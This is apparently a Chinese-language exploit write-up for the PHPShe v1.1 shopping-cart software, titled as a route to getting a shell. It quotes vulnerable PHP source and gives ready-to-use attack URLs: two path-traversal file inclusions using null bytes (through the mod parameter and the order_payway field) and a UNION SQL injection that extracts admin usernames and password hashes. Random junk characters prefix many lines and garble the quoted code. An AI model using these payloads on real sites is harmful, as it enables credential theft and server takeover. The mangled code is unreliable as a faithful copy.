phpshe v1.1多处SQL注入和文件包含漏洞Getshell

admin

/*******************************************************/
5 }# _1 w3 }) Y  f3 }/* Phpshe v1.1 Vulnerability
. @5 s. y2 @" t. k# A  K/* ========================
1 c/ [& [! ]. K% C: l# K/* By: : Kn1f3
' D6 j. D1 i" Y0 W/ W' o7 y  a2 {/* E-Mail : 681796@qq.com
7 Y& P( X' Q. @1 Y/*******************************************************/
* v4 m( s  X- W) Q) F" ]" U0×00 整体大概参数传输

! ?9 c0 I, y) X, Y; C0 v% P; B
  Z8 a$ K8 k6 C# l0 R
//common.php
& _. p0 ]" m& W! O* x& Zif (get_magic_quotes_gpc()) {
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
+ k5 q8 f% }9 o$ T8 B!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
  q6 y3 Q" e" ^!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
( {* x1 `4 s  O" n" @8 l; o}
: \0 \/ |/ x. K: Q4 q3 {# S/ c$ Qsession_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');

6 E" n+ K+ ]% O& `+ @6 M0×01 包含漏洞


//首页文件
4 u9 w) _: ]2 \" d<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
pe_result();
1 V2 f. ^2 ^" `4 e/ c?>
//common 文件 第15行开始
url路由配置
$module = $mod = $act = 'index';
2 M5 I% s$ {; i, O% q$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
) Z. |3 e2 X2 ^* l0 G6 C$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
  r6 t/ n& K6 E9 M$ m; p1 |//exp：http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00

/ [# y2 {' @  I+ g/ z. d7 Z 0×02 搜索注入

<code id="code2">

//product.php文件
5 C+ M# ?. y1 ]; ?& u7 J0 R' Ycase 'list':
7 G  m; u& G  N$category_id = intval($id);
$info = $db->pe_select('category', array('category_id'=>$category_id));
//搜索
  n# I7 B2 f% R" v* \) Y$sqlwhere = " and `product_state` = 1";
pe_lead('hook/category.hook.php');
if ($category_id) {
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
}
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
if ($_g_orderby) {
% e2 V5 O7 E1 k6 w% [$ S& @0 {4 K$orderby = explode('_', $_g_orderby);
5 y$ }' {% J' j. K; w7 Q$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
9 [/ {+ T+ t9 q' c4 y) Q; H}
, _8 h% H7 m9 j! ~else {
- o( f+ L7 L+ X6 W  h" _6 B/ u7 T* F$sqlwhere .= " order by `product_id` desc";
( u4 U% a, V6 r# f+ z0 o9 D}
) ]" A5 p: G0 g2 [; x2 u2 F2 b$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
+ t  j$ g5 X" F5 p4 V3 Q//热卖排行
  g/ H9 x  P/ z8 x$ j; M8 Q$product_hotlist = product_hotlist();
//当前路径
- X$ ]; g) Z( h6 `$nowpath = category_path($category_id);
$seo = pe_seo($info['category_name']);
include(pe_tpl('product_list.html'));
//跟进selectall函数库
8 ]( ^; U4 h& ?: Fpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
) r6 P& Y/ m6 d  i5 J# X: z+ M{
//处理条件语句
$sqlwhere = $this->_dowhere($where);
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
9 `  E) Y* ^% A% w6 b}
//exp
$ m: o5 I& ]& O3 Q1 \product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
7 Y' J5 c# O+ E# G" e: u9 T  v

</code>
& x" u4 a9 V1 g/ i+ _* j! G
0×03 包含漏洞2

, x5 t" h( s* a) I# {7 q* |<code id="code3">

//order.php

case 'pay':

$order_id = pe_dbhold($_g_id);

& @6 C! S8 O) H! e$cache_payway = cache::get('payway');

; q) L+ z6 _% K: g! Q( Cforeach($cache_payway as $k => $v) {

$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

. A% O2 T9 l& V; V8 M/ m1 F8 oif ($k == 'bank') {

$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

0 g. b0 @) f! F}

}

$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

!$order['order_id'] && pe_error('订单号错误...');

if (isset($_p_pesubmit)) {

$ n3 {3 P9 I. n" b5 b7 C2 K* \if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {

5 [2 ?) b, c  H+ Q8 b# b: g* t$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

foreach ($info_list as $v) {

9 Y; G, c( U! I6 J/ i$order['order_name'] .= "{$v['product_name']};";
6 r, s0 |) c3 t7 `! T$ Y" D. C' g. c

}

echo '正在为您连接支付网站，请稍后...';

& k- G4 B! k- i4 R" Z( ]; Zinclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");

}//当一切准备好的时候就可以进行"鸡肋包含了"

6 u  ^* }' c& j4 Jelse {

) a2 G" ?9 ]2 T2 T6 W7 Z: ?pe_error('支付错误...');

}

7 Q: v, G. c8 B: [# m}

$seo = pe_seo('选择支付方式');

include(pe_tpl('order_pay.html'));

; A1 K* B9 l& h! v2 q( a0 cbreak;

}

//exp：

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
+ _8 U1 u+ N  g) K/ A